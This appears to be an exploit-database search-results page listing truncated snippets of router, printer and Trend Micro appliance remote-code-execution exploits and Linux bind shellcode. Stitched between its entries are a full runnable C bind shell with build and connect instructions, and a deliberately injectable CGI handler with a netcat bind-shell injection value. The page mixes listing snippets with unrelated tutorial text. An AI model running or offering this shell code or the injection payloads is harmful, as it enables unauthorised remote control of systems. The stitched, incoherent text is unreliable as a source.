395 matches found
VXSearch 10.2.14 Local SEH Overflow
#!/usr/bin/env python Exploit Title : VXSearch v10.2.14 Local SEH Overflow Date : 11/16/2017 Exploit Author : wetw0rk Vendor Homepage : http://www.flexense.com/ Software link : http://www.vxsearch.com/setups/vxsearchentsetupv10.2.14.exe Version : 10.2.14 Tested on : Windows 7 x86 Description : VX...
VX Search 10.2.14 - Proxy Local Buffer Overflow (SEH)
VX Search 10.2.14 - Proxy Local Buffer Overflow (SEH) #!/usr/bin/env python Exploit Title : VXSearch v10.2.14 Local SEH Overflow Date : 11/16/2017 Exploit Author : wetw0rk Vendor Homepage : http://www.flexense.com/ Software link : http://www.vxsearch.com/setups/vxsearchentsetupv10.2.14.exe Version :...
CoolPlayer+ Portable 2.19.6 Stack Overflow
Exploit Title: CoolPlayer+ Portable 2.19.6 Stack Overflow ASLR Bypass/Bind Shell Exploit Author: 1N3@CrowdShield - https://crowdshield.com Download link:...
TP-Link WR940N - Authenticated Remote Code Exploit
Exploit for hardware platform in category web applications. import urllib2 import base64 import hashlib from optparse import * import sys import urllib banner = "\n" "WR940N Authenticated Remote Code Exploit\n" "This exploit will open a bind shell on the remote target\n" "The port is 31337, you can...
TP-Link WR940N - (Authenticated) Remote Code
TP-Link WR940N - Authenticated Remote Code import urllib2 import base64 import hashlib from optparse import * import sys import urllib banner = "\n" "WR940N Authenticated Remote Code Exploit\n" "This exploit will open a bind shell on the remote target\n" "The port is 31337, you can change that in th...
LFiFreak - An automated LFi Exploiter with Bind/Reverse Shells
LFiFreak is a tool for exploiting local file inclusions using the php://input, php://filter and data: URI wrapper methods. Features: works with Windows, Linux and OS X; includes bind and reverse shells for both Windows and Linux; written in Python 2.7. Dependencies: BeautifulSoup. Download LFiFreak...
Linux/x86 - Bind Shell Shellcode (75 bytes)
Linux/x86 - Bind Shell Shellcode, 75 bytes. Shellcode exploit for the Linux/x86 platform. Architecture : x86 OS : Linux Author : wetw0rk ID : SLAE-958 Shellcode Size : 75 bytes Bind Port : 4444 Description : A Linux/x86 bind shell via /bin/sh. Created by analysing msfvenom; the original payload was 78 bytes...
Linux/x86 - Bind Shell Shellcode (75 bytes)
Architecture : x86 OS : Linux Author : wetw0rk ID : SLAE-958 Shellcode Size : 75 bytes Bind Port : 4444 Description : A Linux/x86 bind shell via /bin/sh. Created by analysing msfvenom; the original payload was 78 bytes and contained 1 NULL. My shellcode is 75 bytes and contains 0 NULLs. Original...
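The two Linux/x86 bind shell entries above describe what the 75-byte payload does (socket, bind on 4444, listen, accept, wire the client to a /bin/sh) and the property the author optimised for (no NULL bytes). The C below is an added example, not the SLAE-958 shellcode or anything from the listing: it is the syscall sequence written out as plain C, which is what you compare your hand-written assembly against, plus a scanner for the NULL-byte property. Port 4444 comes from the entry; the sample byte sequences in main are constructed for illustration.

```c
/* Added example: C reference for a Linux/x86 bind shell plus a NUL-byte
 * check for encoded payloads. Not the listed shellcode; port 4444 is the
 * only value taken from the entry, everything else is an assumption. */
#include <arpa/inet.h>
#include <netinet/in.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

#define BIND_PORT 4444

/* Count 0x00 bytes in buf[0..len). Shellcode that travels through a
 * strcpy-style copy is truncated at the first NUL, so this must be 0. */
size_t count_null_bytes(const unsigned char *buf, size_t len)
{
    size_t n = 0;
    for (size_t i = 0; i < len; i++)
        if (buf[i] == 0x00)
            n++;
    return n;
}

/* Offset of the first NUL, or -1 if there is none; tells you which
 * instruction to re-encode (e.g. mov eax,0 -> xor eax,eax). */
long first_null_offset(const unsigned char *buf, size_t len)
{
    for (size_t i = 0; i < len; i++)
        if (buf[i] == 0x00)
            return (long)i;
    return -1;
}

/* The bind-shell sequence: socket -> bind -> listen -> accept -> dup2 x3
 * -> execve("/bin/sh"). Returns -1 on any failure before execve; on
 * success it never returns because the process becomes the shell. */
int bind_shell(unsigned short port)
{
    int srv = socket(AF_INET, SOCK_STREAM, 0);
    if (srv < 0) return -1;

    struct sockaddr_in sa;
    memset(&sa, 0, sizeof sa);
    sa.sin_family = AF_INET;
    sa.sin_port = htons(port);
    sa.sin_addr.s_addr = INADDR_ANY;   /* 0.0.0.0: every interface */

    if (bind(srv, (struct sockaddr *)&sa, sizeof sa) < 0) return -1;
    if (listen(srv, 1) < 0) return -1;

    int cli = accept(srv, NULL, NULL);
    if (cli < 0) return -1;

    /* stdin/stdout/stderr of the shell become the client socket */
    dup2(cli, 0);
    dup2(cli, 1);
    dup2(cli, 2);

    char *argv[] = { "/bin/sh", NULL };
    execve("/bin/sh", argv, NULL);
    return -1; /* only reached if execve failed */
}

int main(void)
{
    /* Constructed samples: `xor eax,eax ; push eax` (31 c0 50) is clean,
     * `mov eax,0` (b8 00 00 00 00) carries four NULs. */
    static const unsigned char clean[] = { 0x31, 0xc0, 0x50 };
    static const unsigned char dirty[] = { 0xb8, 0x00, 0x00, 0x00, 0x00 };
    printf("clean: %zu NULs, dirty: %zu NULs (first at offset %ld)\n",
           count_null_bytes(clean, sizeof clean),
           count_null_bytes(dirty, sizeof dirty),
           first_null_offset(dirty, sizeof dirty));
    return bind_shell(BIND_PORT);
}
```

Build with `gcc -o bindshell bindshell.c`, run it, and connect with `nc 127.0.0.1 4444` from a second terminal; `strace -f ./bindshell` shows the same socketcall/dup2/execve sequence the shellcode has to reproduce with `int 0x80`. Run the scanner over the extracted shellcode bytes before every test: a single 0x00 explains most "works in the test harness, dies in the target" cases.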
HP PageWide Printers / HP OfficeJet Pro Printers (OfficeJet Pro 8210) - Arbitrary Code Execution Exp
Exploit for hardware platform in category remote exploits. Create a bind shell on an unpatched OfficeJet 8210: write a script to profile.d and reboot the device. When it comes back online, nc to port 1270. easysnmp instructions: sudo apt-get install libsnmp-dev; pip install easysnmp. import socke...
HP PageWide Printers / HP OfficeJet Pro Printers (OfficeJet Pro 8210) - Arbitrary Code Execution
No description provided by source. Create a bind shell on an unpatched OfficeJet 8210: write a script to profile.d and reboot the device. When it comes back online, nc to port 1270. easysnmp instructions: sudo apt-get install libsnmp-dev; pip install easysnmp. import socket import sys from...
HP PageWide / OfficeJet Pro Printers Arbitrary Code Execution
Create a bind shell on an unpatched OfficeJet 8210: write a script to profile.d and reboot the device. When it comes back online, nc to port 1270. easysnmp instructions: sudo apt-get install libsnmp-dev; pip install easysnmp. import socket import sys from easysnmp import snmpset profiledscript =...
Trend Micro Threat Discovery Appliance <= 2.6.1062r1 admin_sys_time.cgi Command Injection Remote Code Execution Vulnerability Raw(CVE-2016-8585)
Summary: There exists a post-authentication command injection vulnerability that can be used to execute arbitrary code as root. Notes: - Since this is BusyBox, getting a connect-back seemed hard. So, for this particular PoC, all I did was exec a bind shell using netcat. - Auth is VERY weak, no...
Trend Micro Threat Discovery Appliance 2.6.1062r1 log_query_system.cgi Remote Code Execution Exploit
Trend Micro Threat Discovery Appliance versions 2.6.1062r1 and below suffer from a log_query_system.cgi remote code execution vulnerability. #!/usr/local/bin/python """ Trend Micro Threat Discovery Appliance + eg: ./poc.py 172.16.175.123 admin123 saturn:trend_micro_threat_discovery_log_query_system_rce mrm...
Trend Micro Threat Discovery Appliance 2.6.1062r1 log_query_dlp.cgi Remote Code Execution
#!/usr/local/bin/python """ Trend Micro Threat Discovery Appliance + eg: ./poc.py 172.16.175.123 admin123 saturn:trend_micro_threat_discovery_log_query_dlp_rce mrme$ ./poc.py 172.16.175.123 admin + logged in... + starting backdoor, this will take a few secs... + calling backdoor! id uid=0(root) gid=0(root)...
Trend Micro Threat Discovery Appliance 2.6.1062r1 admin_sys_time.cgi Remote Code Execution Exploit
Trend Micro Threat Discovery Appliance versions 2.6.1062r1 and below suffer from an admin_sys_time.cgi remote code execution vulnerability. #!/usr/local/bin/python """ Trend Micro Threat Discovery Appliance + eg: ./poc.py 172.16.175.123 admin123 saturn:trend_micro_threat_discovery_admin_sys_time_rce mrme$...
Trend Micro Threat Discovery Appliance 2.6.1062r1 dlp_policy_upload.cgi Remote Code Execution
#!/usr/local/bin/python """ Trend Micro Threat Discovery Appliance /opt/TrendMicro/MinorityReport/bin/ Then, all we do is create /engptnstores/prod/sensorSDK/data/si/dlpkill.sh with malicious code and get it executed... Notes: ====== - For this particular PoC, all I did was exec a bind shell using...
Trend Micro Threat Discovery Appliance 2.6.1062r1 log_query.cgi Remote Code Execution Exploit
Trend Micro Threat Discovery Appliance versions 2.6.1062r1 and below suffer from a log_query.cgi remote code execution vulnerability. #!/usr/local/bin/python """ Trend Micro Threat Discovery Appliance + eg: ./poc.py 172.16.175.123 admin123 saturn:trend_micro_threat_discovery_log_query_rce mrme$ ./poc.py...
Trend Micro Threat Discovery Appliance 2.6.1062r1 admin_sys_time.cgi Remote Code Execution
#!/usr/local/bin/python """ Trend Micro Threat Discovery Appliance + eg: ./poc.py 172.16.175.123 admin123 saturn:trend_micro_threat_discovery_admin_sys_time_rce mrme$ ./poc.py 172.16.175.123 admin123 + logged in... + starting backdoor, this will take a few secs... + calling backdoor! id uid=0(root) gid=0(root)...
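The Trend Micro Threat Discovery Appliance entries above (admin_sys_time.cgi, log_query*.cgi, dlp_policy_upload.cgi) all come down to one bug class: a CGI running as root hands a request field to a shell, and the PoCs ride that to a netcat bind shell. The C below is an added example and not Trend Micro's CGI code or the PoC from the listing: a deliberately vulnerable handler that splices a form value into `system()`, next to a hardened one that allowlists the value and calls `execv` with a fixed argv so no shell ever parses it. The field name `newtime`, the `date -s` command and the sample injected value are assumptions made for the example; the "; nc ... -e /bin/sh" shape only mirrors the bind-shell-via-netcat approach the advisory describes.

```c
/* Added example, not Trend Micro's code: CGI command injection, vulnerable
 * and hardened side by side. Field name, command and payload are assumed. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* VULNERABLE (kept unsafe on purpose): the field lands inside /bin/sh -c.
 * A value like "2017-11-16 10:00:00; nc -l -p 4444 -e /bin/sh" closes the
 * quote context for `date` and runs the rest, as root if the CGI is root. */
int set_time_vulnerable(const char *newtime)
{
    char cmd[512];
    snprintf(cmd, sizeof cmd, "date -s '%s'", newtime);
    return system(cmd);
}

/* Allowlist: exactly "YYYY-MM-DD HH:MM:SS", digits only where 'd' sits.
 * Returns 1 when the value is acceptable, 0 otherwise. */
int valid_datetime(const char *s)
{
    const char *pattern = "dddd-dd-dd dd:dd:dd";
    size_t n = strlen(pattern);
    if (strlen(s) != n) return 0;
    for (size_t i = 0; i < n; i++) {
        if (pattern[i] == 'd') {
            if (s[i] < '0' || s[i] > '9') return 0;
        } else if (s[i] != pattern[i]) {
            return 0;
        }
    }
    return 1;
}

/* Fill argv_out for execv; 1 on success, 0 if the value is rejected.
 * Split out so the argument handling is testable without forking. */
int build_date_argv(const char *newtime, char *argv_out[], size_t argc_max)
{
    if (argc_max < 4 || !valid_datetime(newtime)) return 0;
    argv_out[0] = "date";
    argv_out[1] = "-s";
    argv_out[2] = (char *)newtime;   /* one argv slot, never re-parsed */
    argv_out[3] = NULL;
    return 1;
}

/* HARDENED: validate, then execv a fixed binary with a fixed argv. Even if
 * the allowlist were looser, metacharacters would stay inside argv[2]
 * because no shell sees them. Returns date's exit status, or -1. */
int set_time_hardened(const char *newtime)
{
    char *argv[4];
    if (!build_date_argv(newtime, argv, 4)) return -1;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        execv("/bin/date", argv);
        _exit(127);
    }
    int status;
    waitpid(pid, &status, 0);
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(int argc, char **argv)
{
    /* Default input is a constructed injection attempt; pass a real
     * "YYYY-MM-DD HH:MM:SS" as argv[1] to see the hardened path run date. */
    const char *newtime = argc > 1 ? argv[1]
                                   : "2017-11-16 10:00:00; nc -l -p 4444 -e /bin/sh";
    printf("%s -> %s\n", newtime,
           valid_datetime(newtime) ? "accepted" : "rejected");
    /* Only the hardened handler is ever called here. */
    return set_time_hardened(newtime) == 0 ? 0 : 1;
}
```

When reviewing appliance CGIs, grep for `system(`, `popen(` and `/bin/sh -c` first; every hit that takes anything derived from the request is a candidate, and the fix is always the same pair of moves: a strict allowlist on the value and an exec-family call that does not involve a shell. Note that `execv` alone is not enough if the binary itself interprets its argument (e.g. `-e` to netcat), so the allowlist stays.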
A Red Teamer’s guide to pivoting
A Red Teamer's guide to pivoting. Penetration testers often traverse logical network boundaries in order to gain access to a client's critical infrastructure. Common scenarios include developing the attack into the internal network after a successful perimeter breach o...